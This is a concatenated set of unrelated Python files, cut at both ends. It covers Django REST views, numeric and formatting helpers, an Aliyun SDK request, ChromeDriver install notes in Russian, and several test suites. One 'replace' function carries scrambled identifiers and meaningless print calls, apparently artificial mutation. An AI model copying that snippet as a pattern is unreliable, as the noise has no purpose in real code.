clients = Client.objects.all()
serializer = ClientSerializer(clients, many=True)
return Response(serializer.data)
def post(self, request):
serializer = ClientSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class ClientDetail(APIView):
def get_object(self, client_id):
try:
return Client.objects.get(id=client_id)
except Client.DoesNotExist:
raise Http404
def get(self, request, client_id):
client = self.get_object(client_id)
serializer = ClientSerializer(client)
return Response(serializer.data)
def put(self, request, client_id):
client = self.get_object(client_id)
serializer = ClientSerializer(client, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, client_id):
client = self.get_object(client_id)
client.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
class TalentList(APIView):
def get(self, request):
talents = Talent.objects.all()
serializer = TalentSerializer(talents, many=True)
return Response(serializer.data)
def post(self, request):
serializer = TalentSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class TalentDetail(APIView):
def get_object(self, talent_id):
try:
return Talent.objects.get(id=talent_id)
except Talent.DoesNotExist:
raise Http404
def get(self, request, talent_id):
talent = self.get_object(talent_id)
serializer = TalentSerializer(talent)
return Response(serializer.data)
def put(self, request, talent_id):
talent = self.get_object(talent_id)
serializer = TalentSerializer(talent, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, talent_id):
talent = self.get_object(talent_id)
talent.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
class UserList(APIView):
def get(self, request):
users = User.objects.all()
serializer = UserSerializer(users, many=True)
return Response(serializer.data)
def post(self, request):
serializer = UserSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class UserDetail(APIView):
def get_object(self, user_id):
try:
return User.objects.get(id=user_id)
except User.DoesNotExist:
raise Http404
def get(self, request, user_id):
user = self.get_object(user_id)
serializer = UserSerializer(user)
return Response(serializer.data)
def put(self, request, user_id):
user = self.get_object(user_id)
serializer = UserSerializer(user, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, user_id):
user = self.get_object(user_id)
user.delete()
return Response(status=status.HTTP_204_NO_CONTENT) |
#
from positive import *
# safely join directory strings
def osjoin(a,b):
import os
return str( os.path.join( a, b ) )
# Class for basic print manipulation
class print_format:
magenta = '\033[0;35m'
cyan = '\033[0;36m'
darkcyan = '\033[0;36m'
blue = '\033[0;34m'
green = '\033[92m'
yellow = '\033[0;33m'
red = '\033[31m'
bold = '\033[1m'
grey = gray = '\033[1;30m'
ul = '\033[4m'
end = '\x1b[0m'
hlb = '\033[5;30;42m'
underline = '\033[4m'
# Function that uses the print_format class to make tag text for bold printing
def bold(string):
return print_format.bold + string + print_format.end
def red(string):
return print_format.red + string + print_format.end
def green(string):
return print_format.green + string + print_format.end
def magenta(string):
return print_format.magenta + string + print_format.end
def blue(string):
return print_format.blue + string + print_format.end
def grey(string):
return print_format.grey + string + print_format.end
def yellow(string):
return print_format.yellow + string + print_format.end
def cyan(string):
return print_format.cyan + string + print_format.end
def darkcyan(string):
return print_format.darkcyan + string + print_format.end
def textul(string):
return print_format.underline + string + print_format.end
def underline(string):
return print_format.underline + string + print_format.end
def hlblack(string):
return print_format.hlb + string + print_format.end
#
def poly2latex(basis_symbols,coeffs,latex_labels=None,precision=8,term_split=1000):
# Import useful things
from numpy import mod
#
split_state = False
# Count the number of unique domain variables
domain_dimension = len( set(''.join(basis_symbols).replace('K','')) )
#
if len(basis_symbols)==len(coeffs)==0:
basis_symbols=['']
coeffs = [0]
# Extract desired labels and handle defaults
funlabel = r'f(\vec{x})' if latex_labels is None else latex_labels[0]
varlabel = [ 'x%i'%k for k in range(domain_dimension) ] if latex_labels is None else latex_labels[1]
prefix = '' if latex_labels is None else latex_labels[2]
if varlabel is None:
varlabel = [ r'x_%i'%k for k in range(domain_dimension) ]
elif len(varlabel) != domain_dimension:
error( 'Number of variable labels, %i, is not equal to the number of domain dimensions found, %i.'%( len(varlabel), domain_dimension ) )
# Create a simple string representation of the fit
latex_str = r'%s \; &= \; %s %s\,x%s%s' % ( funlabel,
(prefix+r' \, ( \,') if prefix else '',
complex2str(coeffs[0],
latex=True,precision=precision) if isinstance(coeffs[0],complex) else '%1.4e'%coeffs[0], r'\,x'.join( list(basis_symbols[0]) ), '' if len(coeffs)>1 else (r' \; )' if prefix else '') )
for k,b in enumerate(coeffs[1:]):
latex_str += r' \; + \; (%s)\,x%s%s' % ( complex2str(b,latex=True,precision=precision) if isinstance(b,complex) else '%1.4e'%b ,
r'\,x'.join( list(basis_symbols[k+1]) ),
(r' \; )' if prefix else '') if (k+1)==len(coeffs[1:]) else '' )
#
if ( not mod(k+2,term_split) ) and ( (k+1) < len(coeffs[1:]) ):
latex_str += '\n \\\\ \\nonumber\n & \quad '
if not split_state:
split_state = not split_state
# Correct for a lingering multiply sign
latex_str = latex_str.replace('(\,','(')
# Correct for the constant term not being an explicit function of a domain variable
latex_str = latex_str.replace('\,xK','')
# Replace variable labels with input
for k in range(domain_dimension):
latex_str = latex_str.replace( 'x%i'%k, varlabel[k] )
# Replace repeated variable labels with power notation
for pattern in varlabel:
latex_str = rep2pwr( latex_str, pattern, r'\,' )
return latex_str
# Convert poylnomial (basis symbols and coefficients) to python string
def poly2pystr(basis_symbols,coeffs,labels=None,precision=8):
'''
It's useful to know:
* That "labels" is of the following form
* labels = [range_label,domain_labels,python_prefix]
* EXAMPLE: labels = [ 'temperature', ['day','longitude','latitude','aliens_influence_measure'], '' ]
* The length of basis_symbols and coeffs must match.
* basis_symbols must be consistent with positive.learning.symeval
* EXAMPLE: basis_symbols = ['K','0','1','00']
* this corresponds to a c0 + c1*x + c2*y + c3*x^2, and coeffs = [c0,c1,c2,c3]
'''
# Import usefuls
from positive.api import error
#
if len(basis_symbols)==len(coeffs)==0:
basis_symbols=['']
coeffs = [0]
# Count the number of unique domain variables
domain_dimension = len( set(''.join(basis_symbols).replace('K','')) )
# Extract desired labels and handle defaults
funlabel = 'f' if labels is None else labels[0]
varlabels = None if labels is None else labels[1]
prefix = '' if labels is None else labels[2]
postfix = '' if labels is None else ( labels[3] if len(labels)==4 else '' )
if varlabels is None:
varlabels = [ 'x%s'%str(k) for k in range(domain_dimension) ]
elif len(varlabels) != domain_dimension:
error( 'Number of variable labels, %i, is not equal to the number of domain dimensions found, %i. One posiility is that youre fitting with a 1D domain, and have attempted to use a domain label that is a tuple containing a single string which python may interpret as a string -- try defining the label as a list by using square brackets.'%( len(varlabels), domain_dimension ) , 'mvpolyfit' )
# Replace minus signs in function name with M
funlabel = funlabel.replace('-','M')
# Create a simple string representation of the fit
model_str = '%s = lambda %s:%s%s*(x%s)' % ( funlabel, ','.join(varlabels), (' %s('%prefix) if prefix else ' ' , complex2str(coeffs[0],precision=precision) if isinstance(coeffs[0],complex) else ('%%1.%ie'%precision)%coeffs[0], '*x'.join( list(basis_symbols[0]) ) )
for k,b in enumerate(coeffs[1:]):
model_str += ' + %s*(x%s)' % ( complex2str(b,precision=precision) if isinstance(b,complex) else ('%%1.%ie'%precision)%b , '*x'.join( list(basis_symbols[k+1]) ) )
# Correct for a lingering multiply sign
model_str = model_str.replace('(*','(')
# Correct for the constant term not being an explicit function of a domain variable
model_str = model_str.replace('*(xK)','')
# if there is a prefix, then close the automatic ()
model_str += ' )' if prefix else ''
#
model_str += postfix
# Replace variable labels with input
if not ( varlabels is None ):
for k in range(domain_dimension):
model_str = model_str.replace( 'x%i'%k, varlabels[k] )
return model_str
# Convert complex number to string in exponential form
def complex2str( x, precision=None, latex=False ):
'''Convert complex number to string in exponential form '''
# Import useful things
from numpy import ndarray,angle,abs,pi
# Handle optional precision input
precision = 8 if precision is None else precision
precision = -precision if precision<0 else precision
# Create function to convert single number to string
def c2s(y):
# Check type
if not isinstance(y,complex):
msg = 'input must be complex number or numpy array of complex datatype'
#
handle_as_real = abs(y.imag) < (10**(-precision))
if handle_as_real:
#
fmt = '%s1.%if'%(r'%',precision)
ans_ = '%s' % ( fmt ) % y.real
else:
# Compute amplitude and phase
amp,phase = abs(y),angle(y)
# Write phase as positive number
phase = phase+2*pi if phase<0 else phase
# Create string
# fmt = '%s.%ig'%(r'%',precision)
fmt = '%s1.%if'%(r'%',precision)
ans_ = '%s*%s%s%s' % (fmt, 'e^{' if latex else 'exp(' ,fmt, 'i}' if latex else 'j)') % (amp,phase)
if latex: ans_ = ans_.replace('*',r'\,')
return ans_
# Create the final string representation
if isinstance(x,(list,ndarray,tuple)):
s = []
for c in x:
s += [c2s(c)]
ans = ('\,+\,' if latex else ' + ').join(s)
else:
ans = c2s(x)
# Return the answer
return ans
# Rudimentary function for printing text in the center of the terminal window
def center_space(str):
x = os.popen('stty size', 'r').read()
if x:
rows, columns = x.split()
a = ( float(columns) - float(len(str)+1.0) ) /2.0
else:
a = 0
return ' '*int(a)
def center_print(str):
pad = center_space(str)
print(pad + str)
# Print a short about statement to the prompt
def print_hl(symbol="<>"):
'''
Simple function for printing horizontal line across terminal.
~ ll2'14
'''
x = os.popen('stty size', 'r').read()
if x:
rows, columns = x.split()
if columns:
print(symbol*int(float(columns)/float(len(symbol))))
# Function that returns randome strings of desired length and component of the desired set of characters
def rand_str(size=2**4, characters=string.ascii_uppercase + string.digits):
'''
Function that returns randome strings of desired length and component of the desired set of characters. Started from: https://stackoverflow.com/questions/2257441/random-string-generation-with-upper-case-letters-and-digits-in-python
-- ll2'14
'''
# Ensure that each character has the same probability of being selected by making the set unique
characters = ''.join(set(characters))
# return the random string
return ''.join(random.choice(characters) for _ in range(size))
# Given a string with repeated symbols, convert the repetitions to power notation
def rep2pwr( string, # String to be processed
pattern, # Pattern to look for
delimiter, # Delimeter
latex=True,
pwrfun=None ): # Operation to apply to repetitios of the pattern, eg pwrfun = lambda pattern,N: '%s^%i'%(pattern,N)
'''
Given a string with repeated symbols, convert the repetitions to power notation.
Example:
>> a = '*x*x*x'
>> enpower(a,'*x')
x^{3}
'''
# Handle the power-function input
pwrfun = (lambda pattern,N: '{%s}^{%i}'%(pattern,N)) if pwrfun is None else pwrfun
# Find the maximum number of repetitions by noting it is bound above by the total number of parrtern instances
maxdeg = len(string.split(pattern)) # Technically there should be a -1 here, but let's leave it out to simplify things later on, and avoid buggy behavior
# Copy the input
ans = str(string) # .replace(' ','')
# Look for repetitions
for deg in range( maxdeg, 1, -1 ):
# Create a repeated pattern
reppat = delimiter.join( [ pattern for k in range(deg) ] )
# Look for the pattern, and replace it with the power representation
ans = ans.replace( reppat, pwrfun(pattern,deg) )
# Return the answer
return ans
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkemr.endpoint import endpoint_data
class MetastoreUpdateTableRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Emr', '2016-04-08', 'MetastoreUpdateTable','emr')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_AddColumns(self):
return self.get_query_params().get('AddColumns')
def set_AddColumns(self,AddColumns):
for i in range(len(AddColumns)):
if AddColumns[i].get('Name') is not None:
self.add_query_param('AddColumn.' + str(i + 1) + '.Name' , AddColumns[i].get('Name'))
if AddColumns[i].get('Comment') is not None:
self.add_query_param('AddColumn.' + str(i + 1) + '.Comment' , AddColumns[i].get('Comment'))
if AddColumns[i].get('Type') is not None:
self.add_query_param('AddColumn.' + str(i + 1) + '.Type' , AddColumns[i].get('Type'))
def get_AddPartitions(self):
return self.get_query_params().get('AddPartitions')
def set_AddPartitions(self,AddPartitions):
for i in range(len(AddPartitions)):
if AddPartitions[i].get('Name') is not None:
self.add_query_param('AddPartition.' + str(i + 1) + '.Name' , AddPartitions[i].get('Name'))
if AddPartitions[i].get('Comment') is not None:
self.add_query_param('AddPartition.' + str(i + 1) + '.Comment' , AddPartitions[i].get('Comment'))
if AddPartitions[i].get('Type') is not None:
self.add_query_param('AddPartition.' + str(i + 1) + '.Type' , AddPartitions[i].get('Type'))
def get_DeleteColumnNames(self):
return self.get_query_params().get('DeleteColumnNames')
def set_DeleteColumnNames(self,DeleteColumnNames):
for i in range(len(DeleteColumnNames)):
if DeleteColumnNames[i] is not None:
self.add_query_param('DeleteColumnName.' + str(i + 1) , DeleteColumnNames[i]);
def get_TableId(self):
return self.get_query_params().get('TableId')
def set_TableId(self,TableId):
self.add_query_param('TableId',TableId)
def get_DeletePartitionNames(self):
return self.get_query_params().get('DeletePartitionNames')
def set_DeletePartitionNames(self,DeletePartitionNames):
for i in range(len(DeletePartitionNames)):
if DeletePartitionNames[i] is not None:
self.add_query_param('DeletePartitionName.' + str(i + 1) , DeletePartitionNames[i]); |
TEMPLATE_TYPE_BUTTON = 'button'
TEMPLATE_TYPE_GENERIC = 'generic'
class TemplateElement(object):
def __init__(self, title, subtitle=None, item_url=None, image_url=None, buttons=None):
assert len(title) < 81, 'Title limit of 80 chars reached'
if subtitle is not None:
assert len(subtitle) < 81, 'Subtitle limit of 80 reached'
if buttons is not None:
assert len(buttons) < 4, 'You can only have 3 buttons in an element'
self.title = title
self.subtitle = subtitle
self.item_url = item_url
self.image_url = image_url
self.buttons = buttons
if buttons is None:
self.buttons = []
def to_dict(self):
response = {'title': self.title}
if self.subtitle is not None:
response.update({'subtitle': self.subtitle})
if self.item_url is not None:
response.update({'item_url': self.item_url})
if self.image_url is not None:
response.update({'image_url': self.image_url})
if len(self.buttons):
response.update({'buttons': [b.to_dict() for b in self.buttons]})
return response
class GenericTemplate(object):
def __init__(self, elements):
self.elements = elements
def to_dict(self):
return {
'type': 'template',
'payload': {
'template_type': TEMPLATE_TYPE_GENERIC,
'elements': [
e.to_dict() for e in self.elements
]
}
}
class ButtonTemplate(object):
def __init__(self, text, buttons):
self.text = text
self.buttons = buttons
def to_dict(self):
return {
'type': 'template',
'payload': {
'template_type': TEMPLATE_TYPE_BUTTON,
'text': self.text,
'buttons': [
b.to_dict() for b in self.buttons
]
}
}
|
def replace(identifier_commit_invalid):
print('line_maps')
print('mode_clean_invalid_mask_valid_am_fetch')
"""Replaces a snapshot"""
app = get_app()
tracker_or_and_reader_failover = app.get_snapshot(identifier_commit_invalid
)
if not tracker_or_and_reader_failover:
click.echo("Couldn't find snapshot %s" % identifier_commit_invalid)
sys.exit(1)
app.remove_snapshot(tracker_or_and_reader_failover)
app.create_snapshot(identifier_commit_invalid)
click.echo('Replaced snapshot %s' % identifier_commit_invalid)
print('usage_incr_segment_stat_feature_started_apps')
print('metadata_read_locations_summary_one')
|
print('This app will do things to rainfall data')
print('----------------------------------------')
rainFall = []
monthlyFall = input('Enter the monthly rainfall sep by comma eg 5,6,7,8')
rainFall = monthlyFall.split(',')
#go through each element of the list
#and convert it to an integer
for i in range(len(rainFall)):
rainFall[i] = int(rainFall[i])
total = 0
for x in rainFall:
total += x
maxFall = max(rainFall)
minFall = min(rainFall)
averageFall = total/len(rainFall)
print('The highest rainfall was {0} \n'
'The lowest rainfall was {1} \n'
'The average was {2}'.format(maxFall, minFall, averageFall))
|
# Установка драйвера для браузера
# В этом курсе мы будем работать с драйвером для Chrome, так как на данный момент это самый популярный браузер, и в первую очередь следует убедиться, что веб-приложение работает для большинства пользователей.
# http://gs.statcounter.com/browser-market-share/desktop/worldwide/#monthly-201801-201808-bar
# http://gs.statcounter.com/browser-market-share/desktop/worldwide/#monthly-201801-201808-bar
# Драйвер для Chrome разрабатывается командой браузера и носит название ChromeDriver. Для установки откройте сайт https://sites.google.com/a/chromium.org/chromedriver/downloads и скачайте ту версию ChromeDriver, которая соответствует версии вашего браузера. Чтобы узнать версию браузера, откройте новое окно в Chrome, в поисковой строке наберите: chrome://version/ и нажмите Enter. В верхней строчке вы увидите информацию про версию браузера.
# Для Linux:
# Давайте установим и настроим ChromeDriver с помощью команд в терминале. Укажем нужную нам версию ChromeDriver для загрузки. Для получения ссылки перейдите в браузере на нужную вам версию драйвера по ссылке на https://sites.google.com/a/chromium.org/chromedriver/downloads. На открывшейся странице нажмите на файле для Linux правой кнопкой и скопируйте путь к файлу. Замените в примере ниже путь к файлу для команды wget вашей ссылкой:
# $ wget https://chromedriver.storage.googleapis.com/75.0.3770.8/chromedriver_linux64.zip
# $ unzip chromedriver_linux64.zip
# Переместите разархивированный файл с СhromeDriver в нужную папку и разрешите запускать chromedriver как исполняемый файл:
# $ sudo mv chromedriver /usr/bin/chromedriver
# $ sudo chown root:root /usr/bin/chromedriver
# $ sudo chmod +x /usr/bin/chromedriver
# Настройки для Linux готовы. Переходите к следующему шагу.
# Для Windows:
# Скачайте с сайта https://sites.google.com/a/chromium.org/chromedriver/downloads драйвер для вашей версии браузера. Разархивируйте скачанный файл.
# Создайте на диске C: папку chromedriver и положите разархивированный ранее файл chromedriver.exe в папку C:\chromedriver.
# Добавьте в системную переменную PATH папку C:\chromedriver. Как это сделать в разных версиях Windows, описано здесь: https://www.computerhope.com/issues/ch000549.htm.
# Пример: как добавить путь в системную переменную PATH на Windows10
# 1. Откройте настройки системы.
# 2. В настройках откройте вкладку About, затем System info:
# 3. Выберите Advanced system settings:
# 4. Выберите Environment Variables:
# 5. Кликните два раза на строчке Path в System variables:
# 6. Нажмите кнопку New. Введите в новую строку путь к ChromeDriver - C:\chromedriver. Нажмите Enter. У вас должна появится строка с указанным путем:
# 7. Если у вас была открыта командная строка Windows, не забудьте ее закрыть. Затем откройте новую командную строку, чтобы изменения переменной окружения стали доступны. Активируйте снова виртуальное окружение selenium_env, которое мы создали в предыдущих шагах.
# В следующем шаге мы запустим браузер с помощью Selenium WebDriver и выполним простые команды. |
#!/usr/bin/python
import sys, os, string, re
#This script goes through a ChangeLog and grabs sections based on the search string
#entered by the user. Sections are defined as text between dates
if(len(sys.argv) != 3):
print "Invalid Number of Args"
print "Usage - adjustChangeLog.py filename searchString"
sys.exit(1)
#print "Trying to open " + sys.argv[1]
#Using a try/except to catch file errors
try:
inputFile = open(sys.argv[1],'r') #Open a file for reading
outputFile = open("newChangeLog", 'w') #Open file for writing
except IOError:
print "Error Opening the File"
sys.exit(1)
except:
print "Unhandled Exception"
sys.exit(1)
#print "Open Successful"
#Here's the deal: We're gonna use a for loop, run through all the lines storing
#them in a buffer
#if we find our string, we'll set a flag, when we hit a date, we'll write and flush, or just
#flush the buffer
branchRegEx = re.compile('\(' + sys.argv[2] + r'\)')
stringBuffer = ""
matchToken = 0 #token indicating that our buffer is a good buffer
for line in inputFile.readlines():
temp = re.match(r'\d+-\d+-\d+', line)
temp2 = branchRegEx.search(line)
if temp: #new date, write if we have had a match, otherwise dump the buffer
if(matchToken):
outputFile.write(stringBuffer) #write buffer
stringBuffer = "" #reset the string buffer
matchToken = 0 #reset token
temp3 = string.split(line)
line = temp3[0] + " " + temp3[1] #this removes the names from the changelog, formerly rmname.pl
else:
stringBuffer = "" #store nothing in the string buffer to reset it
#We need these here again for the first entry in the CL
temp3 = string.split(line)
line = temp3[0] + " " + temp3[1] #this removes the names from the changelog, formerly rmname.pl
elif temp2: #we have a match, set the variable
matchToken = 1
line = branchRegEx.sub("", line) #this removes the search string from the changelog
#just copy the line to the buffer while we look for various matches
stringBuffer += line
if matchToken: #No date after last entry, so check one last time
outputFile.write(stringBuffer)
#clean up
outputFile.close()
inputFile.close()
|
from __future__ import print_function, unicode_literals
import datetime
from decimal import Decimal
import json
from mock import patch
from gratipay import wireup
from gratipay.billing.payday import Payday
from gratipay.testing import Harness
class DateTime(datetime.datetime): pass
datetime.datetime = DateTime
class TestCommaize(Harness):
# XXX This really ought to be in helper methods test file
def setUp(self):
Harness.setUp(self)
simplate = self.client.load_resource(b'/about/stats.html')
self.commaize = simplate.pages[0]['commaize']
def test_commaize_commaizes(self):
actual = self.commaize(1000.0)
assert actual == "1,000"
def test_commaize_commaizes_and_obeys_decimal_places(self):
actual = self.commaize(1000, 4)
assert actual == "1,000.0000"
class TestChartOfReceiving(Harness):
def setUp(self):
Harness.setUp(self)
for participant in ['alice', 'bob']:
p = self.make_participant(participant, claimed_time='now', last_bill_result='')
setattr(self, participant, p)
def test_get_tip_distribution_handles_a_tip(self):
self.alice.set_tip_to(self.bob, '3.00')
expected = ([[Decimal('3.00'), 1, Decimal('3.00'), 1.0, Decimal('1')]],
1.0, Decimal('3.00'))
actual = self.bob.get_tip_distribution()
assert actual == expected
def test_get_tip_distribution_handles_no_tips(self):
expected = ([], 0.0, Decimal('0.00'))
actual = self.alice.get_tip_distribution()
assert actual == expected
def test_get_tip_distribution_handles_multiple_tips(self):
carl = self.make_participant('carl', claimed_time='now', last_bill_result='')
self.alice.set_tip_to(self.bob, '1.00')
carl.set_tip_to(self.bob, '3.00')
expected = ([
[Decimal('1.00'), 1L, Decimal('1.00'), 0.5, Decimal('0.25')],
[Decimal('3.00'), 1L, Decimal('3.00'), 0.5, Decimal('0.75')]
], 2.0, Decimal('4.00'))
actual = self.bob.get_tip_distribution()
assert actual == expected
def test_get_tip_distribution_handles_big_tips(self):
self.bob.update_number('plural')
carl = self.make_participant('carl', claimed_time='now', last_bill_result='')
self.alice.set_tip_to(self.bob, '200.00')
carl.set_tip_to(self.bob, '300.00')
expected = ([
[Decimal('200.00'), 1L, Decimal('200.00'), 0.5, Decimal('0.4')],
[Decimal('300.00'), 1L, Decimal('300.00'), 0.5, Decimal('0.6')]
], 2.0, Decimal('500.00'))
actual = self.bob.get_tip_distribution()
assert actual == expected
def test_get_tip_distribution_ignores_bad_cc(self):
bad_cc = self.make_participant('bad_cc', claimed_time='now', last_bill_result='Failure!')
self.alice.set_tip_to(self.bob, '1.00')
bad_cc.set_tip_to(self.bob, '3.00')
expected = ([[Decimal('1.00'), 1L, Decimal('1.00'), 1, Decimal('1')]],
1.0, Decimal('1.00'))
actual = self.bob.get_tip_distribution()
assert actual == expected
def test_get_tip_distribution_ignores_missing_cc(self):
missing_cc = self.make_participant('missing_cc', claimed_time='now', last_bill_result=None)
self.alice.set_tip_to(self.bob, '1.00')
missing_cc.set_tip_to(self.bob, '3.00')
expected = ([[Decimal('1.00'), 1L, Decimal('1.00'), 1, Decimal('1')]],
1.0, Decimal('1.00'))
actual = self.bob.get_tip_distribution()
assert actual == expected
class TestJson(Harness):
def test_200(self):
response = self.client.GET('/about/stats.json')
assert response.code == 200
body = json.loads(response.body)
assert len(body) > 0
class TestRenderingStatsPage(Harness):
def get_stats_page(self):
return self.client.GET('/about/stats.html').body
@patch.object(DateTime, 'utcnow')
def test_stats_description_accurate_during_payday_run(self, utcnow):
"""Test that stats page takes running payday into account.
This test was originally written to expose the fix required for
https://github.com/gratipay/gratipay.com/issues/92.
"""
a_thursday = DateTime(2012, 8, 9, 11, 00, 01)
utcnow.return_value = a_thursday
self.client.hydrate_website()
env = wireup.env()
wireup.billing(env)
payday = Payday.start()
body = self.get_stats_page()
assert "is changing hands <b>right now!</b>" in body, body
payday.end()
@patch.object(DateTime, 'utcnow')
def test_stats_description_accurate_outside_of_payday(self, utcnow):
"""Test stats page outside of the payday running"""
a_monday = DateTime(2012, 8, 6, 11, 00, 01)
utcnow.return_value = a_monday
self.client.hydrate_website()
payday = Payday.start()
body = self.get_stats_page()
assert "is ready for <b>this Thursday</b>" in body, body
payday.end()
|
from setuptools import setup
setup(
name='fake project',
author='Nobody Important',
packages=['fakeproject', 'fakeproject/sub'],
version=0.1,
)
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 12 11:23:28 2017
@author: mmic
"""
import numpy as np
import scipy.stats as st
from scipy.stats import norm
import scipy.integrate as integrate
import numba
def rouwen(rho, mu, step, num):
'''
Adapted from Lu Zhang and Karen Kopecky. Python by Ben Tengelsen.
Construct transition probability matrix for discretizing an AR(1)
process. This procedure is from Rouwenhorst (1995), which works
well for very persistent processes.
INPUTS:
rho - persistence (close to one)
mu - mean and the middle point of the discrete state space
step - step size of the even-spaced grid
num - number of grid points on the discretized process
OUTPUT:
dscSp - discrete state space (num by 1 vector)
transP - transition probability matrix over the grid
'''
# discrete state space
dscSp = np.linspace(mu - (num - 1) / 2 * step, mu + (num - 1) / 2 * step,
num).T
# transition probability matrix
q = p = (rho + 1)/2.
transP = np.array([[p**2, p*(1-q), (1-q)**2],
[2*p*(1-p), p*q+(1-p)*(1-q), 2*q*(1-q)],
[(1-p)**2, (1-p)*q, q**2]]).T
while transP.shape[0] <= num - 1:
# see Rouwenhorst 1995
len_P = transP.shape[0]
transP = p*np.vstack((np.hstack((transP, np.zeros((len_P, 1)))), np.zeros((1, len_P+1)))) \
+ (1 - p)*np.vstack((np.hstack((np.zeros((len_P, 1)), transP)), np.zeros((1, len_P+1)))) \
+ (1 - q)*np.vstack((np.zeros((1, len_P+1)), np.hstack((transP, np.zeros((len_P, 1)))))) \
+ q * np.vstack((np.zeros((1, len_P+1)), np.hstack((np.zeros((len_P, 1)), transP))))
transP[1:-1] /= 2.
# ensure columns sum to 1
if np.max(np.abs(np.sum(transP, axis=1) - np.ones(transP.shape))) >= 1e-12:
print('Problem in rouwen routine!')
return None
else:
return transP.T, dscSp
# Simulate the Markov process - will make this a function so can call later
def sim_markov(z, Pi, num_draws): #we are getting simulated values
# draw some random numbers on [0, 1]
u = np.random.uniform(size=num_draws)
# Do simulations
z_discrete = np.empty(num_draws) # this will be a vector of values
# we land on in the discretized grid for z
N = z.shape[0]
#oldind = int(np.ceil((N - 1) / 2)) # set initial value to median of grid
oldind = 0
z_discrete[0] = oldind
for i in range(1, num_draws):
sum_p = 0
ind = 0
while sum_p < u[i]:
sum_p = sum_p + Pi[ind, oldind]
ind += 1
if ind > 0:
ind -= 1
z_discrete[i] = ind
oldind = ind
z_discrete = z_discrete.astype(dtype = np.int)
return z_discrete
# Function to calculate the distance between mu_s and mu_d
def dist(A,B,C):
D = np.linalg.multi_dot([np.transpose(A - B),np.linalg.inv(C),(A - B)])
return D
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
import astropy.units as u
from numpy.testing import assert_allclose
from astropy.tests.helper import pytest, assert_quantity_allclose
from ...datasets import gammapy_extra
from ...utils.testing import requires_dependency, requires_data
from ...data import ObservationTable
from ...spectrum import SpectrumObservation, SpectrumObservationList
@requires_data('gammapy-extra')
@requires_dependency('matplotlib')
@requires_dependency('scipy')
def test_spectrum_observation():
phafile = gammapy_extra.filename("datasets/hess-crab4_pha/pha_obs23523.fits")
obs = SpectrumObservation.read(phafile)
obs.peek()
@pytest.mark.xfail(reason='This needs some changes to the API')
@requires_data('gammapy-extra')
def test_observation_stacking():
obs_table_file = gammapy_extra.filename(
'datasets/hess-crab4_pha/observation_table.fits')
obs_table = ObservationTable.read(obs_table_file)
temp = SpectrumObservationList.from_observation_table(obs_table)
observations = temp.get_obslist_from_ids([23523, 23592])
spectrum_observation_grouped = SpectrumObservation.stack_observation_list(observations, 0)
obs0 = observations[0]
obs1 = observations[1]
# Test sum on/off vector and alpha group
sum_on_vector = obs0.on_vector.counts + obs1.on_vector.counts
sum_off_vector = obs0.off_vector.counts + obs1.off_vector.counts
alpha_times_off_tot = obs0.alpha * obs0.off_vector.total_counts + obs1.alpha * obs1.off_vector.total_counts
total_off = obs0.off_vector.total_counts + obs1.off_vector.total_counts
assert_allclose(spectrum_observation_grouped.on_vector.counts, sum_on_vector)
assert_allclose(spectrum_observation_grouped.off_vector.counts, sum_off_vector)
assert_allclose(spectrum_observation_grouped.alpha, alpha_times_off_tot / total_off)
# Test arf group
total_time = obs0.meta.livetime + obs1.meta.livetime
arf_times_livetime = obs0.meta.livetime * obs0.effective_area.data \
+ obs1.meta.livetime * obs1.effective_area.data
assert_allclose(spectrum_observation_grouped.effective_area.data, arf_times_livetime / total_time)
# Test rmf group
rmf_times_arf_times_livetime = obs0.meta.livetime * obs0.effective_area.data \
* obs0.energy_dispersion.pdf_matrix.T \
+ obs1.meta.livetime * obs1.effective_area.data \
* obs1.energy_dispersion.pdf_matrix.T
inan = np.isnan(rmf_times_arf_times_livetime / arf_times_livetime)
pdf_expexted = rmf_times_arf_times_livetime / arf_times_livetime
pdf_expexted[inan] = 0
assert_allclose(spectrum_observation_grouped.energy_dispersion.pdf_matrix, pdf_expexted.T, atol=1e-6)
|
#!/usr/bin/env python3
import asyncio
import discord
import datetime
from discord.ext import commands
from utils import database, shared, utils, checks
def time_until_next_birthday():
last_message = utils.read_property('last_birthday_check')
if last_message:
today = datetime.datetime.utcnow().strftime('%Y-%m-%d')
if last_message != today:
return 0
else:
now = datetime.datetime.utcnow()
